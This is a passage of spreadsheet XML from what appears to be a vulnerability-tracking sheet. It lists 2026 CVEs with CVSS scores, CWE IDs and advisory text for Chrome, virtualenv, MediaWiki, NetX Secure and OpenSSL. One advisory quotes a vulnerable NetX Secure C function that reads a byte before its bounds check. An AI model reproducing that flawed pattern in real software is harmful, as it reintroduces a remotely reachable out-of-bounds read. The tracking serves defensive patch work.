      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-610</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>Externally controlled reference in DevTools in Google Chrome prior to 154.0.8037.57 allowed an adjacent attacker leveraging social engineering to bypass system access restrictions via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95376</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102930</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr">
        <is>
          <t>pip:virtualenv</t>
        </is>
      </c>
      <c r="M33" s="5" t="inlineStr">
        <is>
          <t>21.7.12</t>
        </is>
      </c>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr"/>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>`download_wheel()` runs `pip download` and hands the result straight to the seeder, with nothing checking the bytes it gets back. The embedded pip and setuptools wheels carry a `BUNDLE_SHA256` that virtualenv checks on every load, but a wheel fetched over the network for the periodic-update feature or the `--download` flag had no equivalent verification.
A compromised index, a stale mirror, or a MITM'd download (when TLS is intercepted, e.g. via a misconfigured or malicious CA) could substitute a different wheel under the same distribution/version/filename, and virtualenv would cache and seed it into every environment created afterward with no warning.
Fixed by computing the downloaded wheel's sha256 and comparing it against the digest PyPI's public JSON API reports for that exact release, independent of which index actually served the file. The check is skipped, not treated as failure, when a custom index (`PIP_INDEX_URL`, `PIP_EXTRA_INDEX_URL`, `PIP_INDEX`) is configured, since a private index can legitimately serve a different, intentionally rebuilt wheel. Fix: https://github.com/pypa/virtualenv/pull/3251</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102930</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97687</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>urllib3</t>
        </is>
      </c>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr">
        <is>
          <t>pip:urllib3</t>
        </is>
      </c>
      <c r="M34" s="5" t="inlineStr">
        <is>
          <t>2.8.0</t>
        </is>
      </c>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr"/>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-440</t>
        </is>
      </c>
      <c r="S34"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34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97687</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100241</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation Mediawiki - EventBus Extension allows Excavation.
This issue affects Mediawiki - EventBus Extension: 1.47.0-alpha.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100241</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100244</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation Mediawiki - CentralAuth Extension allows Excavation.
This issue affects Mediawiki - CentralAuth Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100244</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102276</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S37"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37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102276</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102278</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>node.js, rust</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S38"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38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102278</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102281</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-674</t>
        </is>
      </c>
      <c r="S39"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39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102281</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102728</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>Two client-side TLS/DTLS handshake parsers in NetX Secure read fields from a server-supplied message before validating that the message is long enough to contain them. Both are bounded out-of-bounds reads on a remotely reachable path, both are reached from a TLS or DTLS client connecting to a malicious or malformed server, and both have the same shape: the bounds check exists and returns the correct status, but it runs after the read it is meant to guard.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102728</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102758</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>The `_nx_secure_x509_asn1_tlv_block_parse()` function parses ASN.1 TLV (tag-length-value) blocks out of DER-encoded data. It is the primitive underneath all X.509 certificate parsing in NetX Secure, and therefore runs on certificates supplied by a remote peer during the TLS handshake.
The function reads the one-byte ASN.1 tag from the caller's buffer *before* checking that the buffer holds at least one byte. When a caller passes a remaining length of zero, the guard correctly returns `NX_SECURE_X509_ASN1_LENGTH_TOO_LONG`, but the read has already happened one byte past the end of the buffer.
code:
nx_secure/src/nx_secure_x509_asn1_tlv_block_parse.c
```
UINT _nx_secure_x509_asn1_tlv_block_parse(const UCHAR *buffer, ULONG *buffer_length, USHORT *tlv_type,
                                          USHORT *tlv_tag_class, ULONG *tlv_length,
                                          const UCHAR **tlv_data, ULONG *header_length)
{
UINT   current_index;
USHORT current_tag;
ULONG  length;
ULONG  length_bytes;
    current_index = 0;
    current_tag = buffer[current_index];      /* &lt;-- read before the bounds check */
    if (*buffer_length &lt; 1)
    {
        return(NX_SECURE_X509_ASN1_LENGTH_TOO_LONG);
    }
```
The remainder of the function is correctly ordered. The multi-byte length path is guarded by `length_bytes &gt; 4 || length_bytes &gt; *buffer_length` before its read loop, the decoded value is checked against `length &gt; *buffer_length`, and the second single-byte length read follows its own `*buffer_length &lt; 1` guard. The tag read is the only load placed ahead of its check.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102758</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54873</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>Issue summary: QUIC process may keep memory for QUIC packet
buffer for much longer period than necessary.
Impact summary: Remote peer can exploit this vulnerability
by sending maliciously crafted packets, making the local
QUIC stack to keep the memory for packet buffers allocated.
The time for which the memory remains allocated is entirely
under the control of the potentially malicious remote peer.
CWE: CWE-770: Allocation of Resources Without Limits or Throttling
Description: To save copy operation from the packet buffer to the
stream reassemble buffer the QUIC stack leaves the stream data
on the packet buffer waiting to be copied to a buffer provided
by the local receiving application. The QUIC stack releases
a reference to the packet buffer only after the data are copied
to the application buffer. This design is more efficient for
legitimate data transfers but enables an attacker to allocate a lot
more memory than actually required by the data kept in the receiving
stream buffer.
To mitigate the vulnerability, the QUIC stack now calculates
and monitors memory overhead for every stream. The memory overhead
for a single stream frame is calculated as a difference between the
size of the whole packet that carries the stream frame and the size
of the stream frame itself. The memory overhead for a single stream
frame is added to the total (cumulative) memory overhead QUIC stack
keeps for each stream. Once the cumulative memory overhead exceeds
64kB, the QUIC stack moves the stream frame data from the packet
buffer to the stream buffer, starting with the next packet received.
FIPS impact: no
The FIPS module is not affected as the QUIC implementation is outside of
the OpenSSL FIPS module boundary.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54873</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102266</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>python, go, rust</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S43"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43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102266</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102267</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>python, rust</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-345, CWE-918</t>
        </is>
      </c>
      <c r="S44"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44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102267</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102271</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S45"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45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102271</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102272</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S46"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46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102272</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102273</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S47"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47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102273</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100288</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
